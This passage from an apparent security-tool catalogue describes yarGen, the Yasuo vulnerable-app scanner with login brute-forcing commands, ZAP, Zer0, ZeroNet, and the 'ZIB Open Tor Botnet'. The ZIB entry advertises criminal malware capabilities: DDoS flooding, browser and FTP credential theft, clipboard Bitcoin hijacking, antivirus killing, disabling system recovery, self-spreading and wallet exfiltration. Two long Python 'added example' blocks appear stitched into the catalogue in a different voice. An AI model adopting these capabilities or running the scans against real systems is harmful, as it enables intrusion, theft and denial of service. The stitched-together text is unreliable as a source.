certain necessary strings. If the strings don't show up, the rule fires.
This indicates a replaced system file or a malware file that tries to
masquerade as a system file.
python yarGen.py --inverse -oe -m G:\goodware\

You can also instruct yarGen not to include the file path but to rely
solely on the filename.
python yarGen.py --inverse -oe --nodirname -m G:\goodware\

Download yarGen
YASUO - SCANS FOR VULNERABLE & EXPLOITABLE
3RD-PARTY WEB APPLICATIONS

Yasuo is a Ruby script that scans for vulnerable 3rd-party web
applications.
While working on a network security assessment (internal, external, red
team gigs etc.), we often come across vulnerable 3rd-party web
applications or web front-ends that allow us to compromise the remote
server by exploiting publicly known vulnerabilities. Some of the common
and favorite applications are the Apache Tomcat administrative
interface, the JBoss jmx-console, Hudson/Jenkins and so on.
If you search through Exploit-DB, there are over 10,000 remotely
exploitable vulnerabilities in tons of web applications/front-ends that
could allow an attacker to completely compromise the back-end server.
These vulnerabilities range from RCE to malicious file uploads to SQL
injection to RFI/LFI etc.
Yasuo is built to quickly scan the network for such vulnerable
applications, thus serving pwnable targets on a silver platter.

Setup / Install

You would need to install the following gems:
gem install ruby-nmap net-http-persistent mechanize colorize text-table

Details

Yasuo provides the following command-line options:
-r :: If you want Yasuo to perform a port scan, use this switch to
provide an IP address, an IP range or an input file with
newline-separated IP addresses
-s :: Provide a custom signature file. [./yasuo.rb -s mysignatures.yaml
-f nmap.xml] [Default - signatures.yaml]
-f :: If you do not want Yasuo to perform a port scan and already have
nmap output in XML format, use this switch to feed it the nmap output
-n :: Tells Yasuo not to ping the host while performing the port scan.
Standard nmap option.
-p :: Use this switch to provide port number(s)/range
-A :: Use this switch to scan all 65535 ports. Standard nmap option.
-b [all/form/basic] :: If the discovered application implements
authentication, use this switch to brute-force the auth. "all" will
brute-force both form and HTTP basic auth. "form" will only brute-force
form-based auth. "basic" will only brute-force HTTP basic auth.
-t :: Specify the maximum number of threads
-h :: Well, take a guess

Examples
./yasuo -r 127.0.0.1 -p 80,8080,443,8443 -b form
The above command will perform a port scan against 127.0.0.1 on ports
80, 8080, 443 and 8443 and will brute-force the login of all
applications that implement form-based authentication.
./yasuo -f my_nmap_output.xml -b all
The above command will parse the nmap output file "my_nmap_output.xml"
and will brute-force the login of all applications that implement
form-based or HTTP basic authentication.

Download YASUO
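
The -f workflow (parse nmap XML, take the open web ports, probe each one against a list of application signatures) is shown below as an added example in Python; it is not Yasuo's code and does not use its signatures.yaml. The nmap report, the three signatures, the response-matching rule (expected status plus a body marker) and the canned responses that stand in for the network are all constructed for this example.

```python
# Added example (not Yasuo's code): the pipeline behind Yasuo's -f mode.
# nmap XML -> open http/https ports -> signature probes -> findings.
# Signature format and canned responses are this example's own.
import xml.etree.ElementTree as ET

NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><status state="up"/><address addr="10.0.0.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="8080"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="8443"><state state="open"/><service name="https" tunnel="ssl"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.0.8" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="filtered"/><service name="http"/></port>
    </ports></host>
</nmaprun>"""

# Each signature: path to probe, expected status, a marker that must appear
# in the body, and which kind of auth (if any) a later brute-force would target.
SIGNATURES = [
    {"app": "Tomcat Manager", "path": "/manager/html", "status": 401, "marker": "Tomcat Manager", "auth": "basic"},
    {"app": "JBoss jmx-console", "path": "/jmx-console/", "status": 200, "marker": "JMX Agent View", "auth": None},
    {"app": "Jenkins", "path": "/login", "status": 200, "marker": "Jenkins", "auth": "form"},
]

def web_targets(xml_text):
    """Return (host, port, scheme) for every open port nmap labelled http/https."""
    targets = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "")
            if not name.startswith("http"):
                continue
            scheme = "https" if name == "https" or svc.get("tunnel") == "ssl" else "http"
            targets.append((addr, int(port.get("portid")), scheme))
    return targets

def match_signatures(fetch, base_url):
    """Probe every signature path via fetch(url) -> (status, body) and
    return the signatures whose status and body marker both match."""
    hits = []
    for sig in SIGNATURES:
        status, body = fetch(base_url + sig["path"])
        if status == sig["status"] and sig["marker"] in body:
            hits.append(sig)
    return hits

def scan(xml_text, fetch):
    """Full pipeline: nmap XML -> web targets -> matched applications."""
    findings = []
    for host, port, scheme in web_targets(xml_text):
        base = f"{scheme}://{host}:{port}"
        for sig in match_signatures(fetch, base):
            findings.append({"url": base + sig["path"], "app": sig["app"], "auth": sig["auth"]})
    return findings

# Canned responses standing in for the network: a Tomcat manager behind
# basic auth on 8080, nothing of interest anywhere else.
CANNED = {
    "http://10.0.0.7:8080/manager/html": (401, "<h1>401 Unauthorized</h1> Tomcat Manager Application"),
    "http://10.0.0.7:8080/jmx-console/": (404, "Not Found"),
    "http://10.0.0.7:8080/login": (404, "Not Found"),
}

def canned_fetch(url):
    return CANNED.get(url, (404, "Not Found"))

if __name__ == "__main__":
    for finding in scan(NMAP_XML, canned_fetch):
        print(finding)
```

Matching on status code plus a body marker, rather than on status alone, is what keeps a catch-all 200 page or a generic 401 from being reported as an application; the "auth" field is what decides whether the -b form or -b basic brute-force step would apply to the hit.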
YAVOL - GUI FOR VOLATILITY FRAMEWORK AND YARA

This is just another GUI for Volatility and YARA which could make
someone's life easier. It is intended for incident responders for the
quick examination of a memory image. Results are stored in an SQLite
database for reuse.

1. INSTALLATION
Clone the repo
git clone https://Ft44k@bitbucket.org/Ft44k/yavol.git
The default folder for YARA signatures is /yara_rules

2. PREREQUISITES
You need to have Python (2.7), PyQt4 and sqlite3 installed.

Download YaVol
ZAP 2.4.2 - PENETRATION TESTING TOOL FOR TESTING
WEB APPLICATIONS

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration
testing tool for finding vulnerabilities in web applications.
It is designed to be used by people with a wide range of security
experience and as such is ideal for developers and functional testers
who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow
you to find security vulnerabilities manually.

Release 2.4.2

The following changes were made in this release:

Enhancements:
Issue 1306 : Java PermSize command line flag removed in Java 8
Issue 1593 : Auto-scroll in Spider tab
Issue 1600 : Don't report X-Frame-Options alert on 403 and 404 pages
Issue 1654 : httpSessions/createEmptySession should initialize a site that was not previously visited
Issue 1702 : Add "recurse" option to the spider API
Issue 1715 : Unable to pass arguments when launching ZAP from the command line on Mac OS X
Issue 1766 : Remove context via the API
Issue 1768 : Update to use a more recent user-agent
Issue 1778 : Passive scan AJAX spider requests
Issue 1790 : Move Buffer Overflow Scanner from Beta to Release
Issue 1793 : Allow active scan scripts to check if the scan was stopped
Issue 1795 : Allow JVM options to be configured via GUI
Issue 1799 : Minor Feature Request: Allow URL to be pasted into start Spider dialog.
Issue 1802 : Minor Enhancement: Change active Pause Button to a Play button
Issue 1849 : Option to merge related issues in reports
Issue 1857 : Libraries that were updated
Issue 1865 : Increase maximum db size

Bug fixes:
Issue 1760 : Unable to initialize home directory! xml/config.xml (No such file or directory)
Issue 1763 : Automatic check for updates fails to report new versions
Issue 1770 : Exceptions when calling (some) context API actions in daemon mode
Issue 1771 : For OSX the zap.sh in the core download hard-codes the relative java location
Issue 1772 : On OS X, Found Java version lies
Issue 1777 : "Cannot locate configuration source null.policy" after opening "Active Scan" dialogue
Issue 1781 : ZAP errors with "Unsupported option 'psn_x_xxxxxxx'" on OS X
Issue 1784 : NullPointerException when active scanning through the API with a target without scheme
Issue 1785 : Plugin enabled even if dependencies are not, "hangs" active scan
Issue 1787 : Context not used by the Spider even if selected
Issue 1788 : Scan Progress Pane Needs Sorting Change
Issue 1789 : Forced Browse/AJAX Spider messages not restored to Sites tab
Issue 1792 : Report not generated in daemon mode
Issue 1798 : Stop Attack Feature Locks up ZAP?
Issue 1804 : Disable processing of XML external entities by default
Issue 1805 : ZAP API might not return the response in requested format on errors
Issue 1858 : Spider might report wrong progress after finishing
Issue 1872 : EDT accessed in daemon mode

Download ZAP 2.4.2
ZER0 - SECURED FILE DELETION MADE EASY

Zer0 is a user-friendly file deletion tool with a high level of
security.
With Zer0, you'll be able to delete files and to prevent file recovery
by a third person. So far, no user has reported an efficient method to
recover a file deleted by Zer0. Keep in mind that overwrite-based
deletion only destroys data that is rewritten in place: on SSDs with
wear levelling and on journaling or copy-on-write file systems, earlier
copies of the content can survive, so full-disk encryption or a
device-level secure erase is the stronger control in those cases.

Features

User-friendly HMI: drag'n'drop, one click and the job is done!
High security file deletion algorithm
Multithreaded application core: maximum efficiency without freezing the
application.
Internationalization support.

Download Zer0
ZERONET - DECENTRALIZED WEBSITES USING BITCOIN
CRYPTO AND BITTORRENT NETWORK

Decentralized websites using Bitcoin crypto and the BitTorrent network -
http://zeronet.io

Why?

We believe in open, free, and uncensored network and communication.
No single point of failure: a site remains online as long as at least 1
peer is serving it.
No hosting costs: sites are served by visitors.
Impossible to shut down: it's nowhere because it's everywhere.
Fast and works offline: you can access the site even if your internet
is unavailable.

Features

Real-time updated sites
Namecoin .bit domains support
Easy to set up: unpack & run
Clone websites in one click
Password-less BIP32 based authorization: your account is protected by
the same cryptography as your Bitcoin wallet
Built-in SQL server with P2P data synchronization: allows easier site
development and faster page load times
Tor network support
TLS encrypted connections
Automatic uPnP port opening
Plugin for multiuser (openproxy) support
Works with any browser/OS

How does it work?

After starting zeronet.py you will be able to visit zeronet sites using
http://127.0.0.1:43110/{zeronet_address} (e.g.
http://127.0.0.1:43110/1EU1tbG9oC1A8jz2ouVwGZyQ5asrNsE4Vr).
When you visit a new zeronet site, it tries to find peers using the
BitTorrent network so it can download the site files (html, css, js...)
from them.
Each visited site is then also served by you.
Every site contains a content.json which holds the sha512 hash of all
other files and a signature generated using the site's private key.
If the site owner (who has the private key for the site address)
modifies the site, he/she signs the new content.json and publishes it to
the peers. After the peers have verified the integrity of content.json
(using the signature), they download the modified files and publish the
new content to other peers.
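
The verification a peer performs in the flow above has two parts: the signature over the manifest (which ties the content to whoever holds the site's private key) and the per-file hashes listed in the manifest. The following added example, which is not ZeroNet's code, walks through both in pure Python using ECDSA over secp256k1, the curve behind Bitcoin addresses. The manifest layout, the fixed owner key, the two site files and the simplified deterministic nonce derivation are this example's own assumptions; ZeroNet's actual content.json fields and Bitcoin-style message signature encoding differ.

```python
# Added example (not ZeroNet's code): peer-side verification of a signed
# site manifest. Pure-Python ECDSA over secp256k1; the nonce derivation
# is a simplification, not RFC 6979, and the manifest format is this
# example's own, not ZeroNet's exact content.json.
import hashlib
import json

# secp256k1 domain parameters
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def ec_add(a, b):
    """Affine point addition on secp256k1 (None is the point at infinity)."""
    if a is None:
        return b
    if b is None:
        return a
    if a[0] == b[0] and (a[1] + b[1]) % P == 0:
        return None
    if a == b:
        lam = (3 * a[0] * a[0]) * pow(2 * a[1], -1, P) % P
    else:
        lam = (b[1] - a[1]) * pow(b[0] - a[0], -1, P) % P
    x = (lam * lam - a[0] - b[0]) % P
    return x, (lam * (a[0] - x) - a[1]) % P

def ec_mul(k, point):
    """Double-and-add scalar multiplication."""
    result, addend = None, point
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result

def sign(priv, msg):
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    # Deterministic nonce (simplified; real code uses RFC 6979 or a CSPRNG).
    k = int.from_bytes(hashlib.sha256(priv.to_bytes(32, "big") + msg).digest(), "big") % N or 1
    r = ec_mul(k, G)[0] % N
    s = pow(k, -1, N) * (z + r * priv) % N
    return r, s

def verify(pub, msg, sig):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    w = pow(s, -1, N)
    point = ec_add(ec_mul(z * w % N, G), ec_mul(r * w % N, pub))
    return point is not None and point[0] % N == r

def build_manifest(files, priv):
    """Site owner side: hash every file, then sign the canonical manifest."""
    body = {"files": {name: hashlib.sha512(data).hexdigest() for name, data in files.items()}}
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    body["sign"] = list(sign(priv, canonical))
    return body

def verify_site(manifest, files, pub):
    """Peer side: signature over the manifest first, then every file hash.
    Returns (ok, reason)."""
    unsigned = {"files": manifest["files"]}
    canonical = json.dumps(unsigned, sort_keys=True, separators=(",", ":")).encode()
    if not verify(pub, canonical, tuple(manifest["sign"])):
        return False, "bad signature"
    for name, digest in manifest["files"].items():
        if name not in files:
            return False, f"missing {name}"
        if hashlib.sha512(files[name]).hexdigest() != digest:
            return False, f"modified {name}"
    return True, "ok"

# Constructed site: a fixed private key (assumption) and two files.
OWNER_PRIV = 0x1E99423A4ED27608A15A2616A2B0E9E52CED330AC530EDCC32C8FFC6A526AEDD
OWNER_PUB = ec_mul(OWNER_PRIV, G)
SITE_FILES = {"index.html": b"<h1>hello</h1>", "app.js": b"console.log(1)"}

if __name__ == "__main__":
    manifest = build_manifest(SITE_FILES, OWNER_PRIV)
    print(verify_site(manifest, SITE_FILES, OWNER_PUB))
    print(verify_site(manifest, dict(SITE_FILES, **{"app.js": b"fetch('http://evil')"}), OWNER_PUB))
```

The order of the two checks is the point: a peer that re-hashed the files without first checking the signature could be fed a manifest rewritten by anyone, so the hash list only means something once the signature has bound it to the site owner's key; with that done, a file changed on a peer fails on its hash, and a manifest rewritten to cover the change fails on its signature.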

How to join?

Windows

Download the ZeroBundle package that includes Python 2.7.9 and all
required libraries
Unpack to any directory
Run zeronet.cmd
It downloads the latest version of ZeroNet and then starts it
automatically.

Alternative method for Windows by installing Python
Install Python 2.7
Install Python Greenlet
Install Python Gevent
Install Python MsgPack
Download and extract ZeroNet to any directory
Run start.py

Linux

Debian
sudo apt-get update
sudo apt-get install msgpack-python python-gevent
wget https://github.com/HelloZeroNet/ZeroNet/archive/master.tar.gz
tar xvpfz master.tar.gz
cd ZeroNet-master
Start with python zeronet.py
Open http://127.0.0.1:43110/ in your browser and enjoy! :)

Other Linux or without root access
Check your Python version using python --version; if the returned
version is not Python 2.7.X then try the python2 or python2.7 command
and use it from now on
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py --user gevent msgpack-python
Start with python zeronet.py

Mac
Install Homebrew
brew install python
pip install gevent msgpack-python
Download, unpack, run python zeronet.py

Vagrant
vagrant up
Access the VM with vagrant ssh
cd /vagrant
Run python zeronet.py --ui_ip 0.0.0.0
Open http://127.0.0.1:43110/ in your browser

Docker
docker run -p 15441:15441 -p 43110:43110 nofish/zeronet
Open http://127.0.0.1:43110/ in your browser

Download ZeroNet
ZIB - THE OPEN TOR BOTNET

General information and instructions.

The Open Tor Botnet requires the installation and configuration of
bitcoind; however, I neglect to detail this here for lack of time.
This botnet is fully undetectable and bypasses all antivirus by running
on top of Python 2.7's PyInstaller, which is used for many non-Trojan
programs. The only hypothetical possibility of detection comes from the
script; however, the script contains randomized-looking data through the
use of a randomized AES key and initialization vector, so this is a
non-issue.
ZIB.py is the main project file.
intel.py is the chat bot for handling automatic transactions and client
authentication.
compileZIB.py is used by intel.py, and is started in the background
using chp.exe.
ZIB_imports.txt contains all the Python module imports that ZIB uses.
They're appended to the script during compilation.
btcpurchases.txt includes all the Bitcoin payments that are pending.
Pending transactions older than 24 hours are deleted.
channels.txt includes all completed BTC payments.
Point your webserver to C:\Python27\dist\ for hosting the bot
executables.
chp.exe is required in the local dir.
For the IRC server, run bircd, set up an oper with the username Zlo and
password RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$. Set the max users
per IP to 0 because Tor users all connect from 127.0.0.1 and look the
same to the IRCd. Keep all scripts in C:\Python27\Scripts.
Put nircmd in the local directory for editing file dates.

Features

ZIB is an IRC-based, Bitcoin-funded bot network that runs under Tor for
anonymity.
ZIB is coded totally from scratch.
ZIB uses the Department of Defense standard for encryption of Top Secret
files as one of the methods of generating fully undetectable binaries
every time!
ZIB creates a new binary for every client with varying file sizes,
creation dates, and rot13->zlib->base64->AES-256 (random key+IV)
encrypted strings.
ZIB is fully undetectable (FUD) to anti-virus.
ZIB has an automated system for handling payments, providing botnet
binaries, and creating botnet IRC channels.
All bot networks on a ZIB network require a password to join.
ZIB uses passworded user-based authentication, handled through our Zlo
intelligence bot, so you don't have to worry about channel password,
main password, or bot compromise. Normal users can't create their own
channels. All IRC functionality is handled by the Zlo IRC intelligence
bot. You can do authenticated single-bot commands through Zlo, or set up
a user session on your bots, which is slightly less secure.
Paid users get unlimited bot space per channel.
Our bot has been tested on and is fully compatible with Windows Server
2008 R2 32-bit, Windows XP SP1 & SP3 32-bit, Windows 7, and Windows 8
64-bit.

Features

Multi-threaded HTTP/S (layer 7 [methods: TorsHammer, PostIt, Hulk,
ApacheKiller, Slowloris, GoldenEye]), TCP/SSL, and fine-tuned UDP
flooding. Ability to flood hidden services, or attack via the clearnet.
66 randomized DDoS user-agents and referers. All methods send randomized
data and bypass firewalls, filtering, and caching. ZIB also comes with
FTP flood and TeamSpeak flood.
Undetectable ad-fraud smart viewer that's fully compatible with Firefox,
Tor Browser Bundle, Portable Firefox, Internet Explorer, Google Chrome,
Opera, Yandex, Torch, FlashPeak SlimBrowser, Epic Privacy Browser,
Baidu, Maxthon, Comodo IceDragon, and QupZilla.
Download & execute with optional SHA256 verification.
Update with optional SHA256 verification.
Chrome password recovery.
Each bot can act as a shell booter and utilize external PHP shells for
attacks.
Replace Bitcoin addresses in the clipboard with yours.
FileZilla password recovery.
Fully routed through Tor.
File, registry, startup folder, and main/daemon/tor process persistence.
Installation and use is completely hidden from bots.
0/60 fully undetectable to antivirus.
File download/upload.
Process status, creator, and killer.
Undetectable, instant obfuscation when generating new binaries.
Self spreading.
All bot files are SHA256 hash verified. Broken/corrupted files get
replaced.
Bypasses antivirus deep scan.
Bot location varies, depending on administrative access.
IRC nickname format: Country[version]Windows version|CPU bits|user
privileges|CPU cores|random characters. Ex: US[v2]XP|x32|A|4c|F4L0s4kpN5.
64-bit detection may be having issues (shows up as 32-bit).
Disables various Windows functions WITHOUT giving the user warnings!
Disables Microsoft Windows error reporting, sending additional data,
and error logging - system-wide as administrator, and on a per-user
basis.
Disables User Account Control (UAC) - system-wide as administrator, and
on a per-user basis.
Disables the Windows Volume Shadow Copy Backup Service (vss) -
system-wide as administrator.
Disables the System Restore Service (srservice) - system-wide as
administrator.
Disables System Restore - system-wide as administrator.
Melts on execution. The original file gets deleted. Should delete the
file out of the temporary folder if used with a binder.
Multi-threaded mass SSH scanner that saves servers on the bot's HDD
encoded with base64, without duplicates or honeypots. Four integrated
password lists of increasing difficulty [A,B,C,D], or brute force with
min/max characters (supports numbers, upper/lowercase letters, symbols).
Cracked routers are used for UDP/TCP/HTTP/ICMP flooding. UDP flood
requires having the routers download a Python script, and the majority
of routers won't have Python. Has the ability to be used to take down
DDoS-protected servers from scanning with just one bot. The Open Tor
Botnet optionally will scan under Tor, multiple ports at once, IP
range/s [A/B/C] or randomized IPs, optionally block government IPs, and
blocks reserved IPv4 addresses aside from the user's LAN. BotKiller with
file scanning [kills .exe, .bat, .scr, .pif, .dll, .lnk, .com] in
AppData, Startup, etc. and has been successful against NanoCore,
Andromeda, AGhost Silent Miner, Plasma HTTP/IRC/RAT, and almost every
HackForums bot. The botkiller utilizes process scanning with file
deletion, and registry scanning.
Mutex. No duplicate IRC connections.
Amazing error handling, install rate, detection ratio, and persistence.
Completely native malware. No .NET framework or Python installation
required!
Installs to the startup folder & AppData with a registry RUN key.
Kills all popular anti-virus and prevents A/V installation. Will disable
anti-virus which have rootkits, through deleting important A/V DLLs.
BotKiller, scanner, and A/V killer are optional. You could easily run
the Open Tor Botnet as a back-up for your bots, or install other
software on them as back-up. The network control system is highly
scalable. Dual-process and dual-file persistence. Files and processes
are re-created nearly instantly after being removed.
Recovers FileZilla logins, which is great for getting SSH and FTP
logins.
Automatically removes some ad-ware.
Contains an Omegle spreader which spreads either a link through social
engineering tactics, or a Skype account, with every line of text being
completely unique in order to avoid detection. Always waits for the
Omegle stranger to type a message before responding with a reply. Shows
stranger typing, and writes messages human-like. Multi-threaded.
Deletes the zone identifier on all bot files, Tor, downloaded & executed
files, and update files. This means that you don't get the "Would you
like to run this program?" dialog, and it runs completely hidden.
Detects all Windows operating systems from Windows 95, ME, to 8. Will
show Windows 10 as just Windows, or W8.
Text-to-speech with speaker detection.
Duplicate nickname handling, and ping-out handling.
Tor is downloaded directly from the Tor Project - it only needs to be
downloaded once, but still has persistence.
Grabs the bot IP address on startup, has the ability to disable/enable
bot command response, view the status of the SSH scanner/Omegle
spreading/DDoS/botkiller and start/stop them.
Functionality to kill the bot instance, uninstall ZIB, grab full OS
info, check if a host on a certain port is online/offline using a TCP
connect and a full HTTP request whilst checking the reply for server
status related information.
Check if a process is running, how many are running, and list
directories. Use \ instead of C:\, e.g. !dir \ as some people run their
main operating system on non-standard drive letters, especially on
servers.
Upload specific files of your choosing that exist on a bot's computer to
your FTP server. Files that can be uploaded could include BTC wallets.
Read files in plain text off zombie computers. View the number of
scanned SSH servers. Kill processes. The bot will tell you about missing
command parameters, if a certain parameter contains the wrong data type,
etc. Errors from executing a command are output to the IRC channel
without flooding the chat.
Commands are run multi-threaded and concurrently. This means your bots
won't freeze up each time you run a command.

Download Zib-Trojan
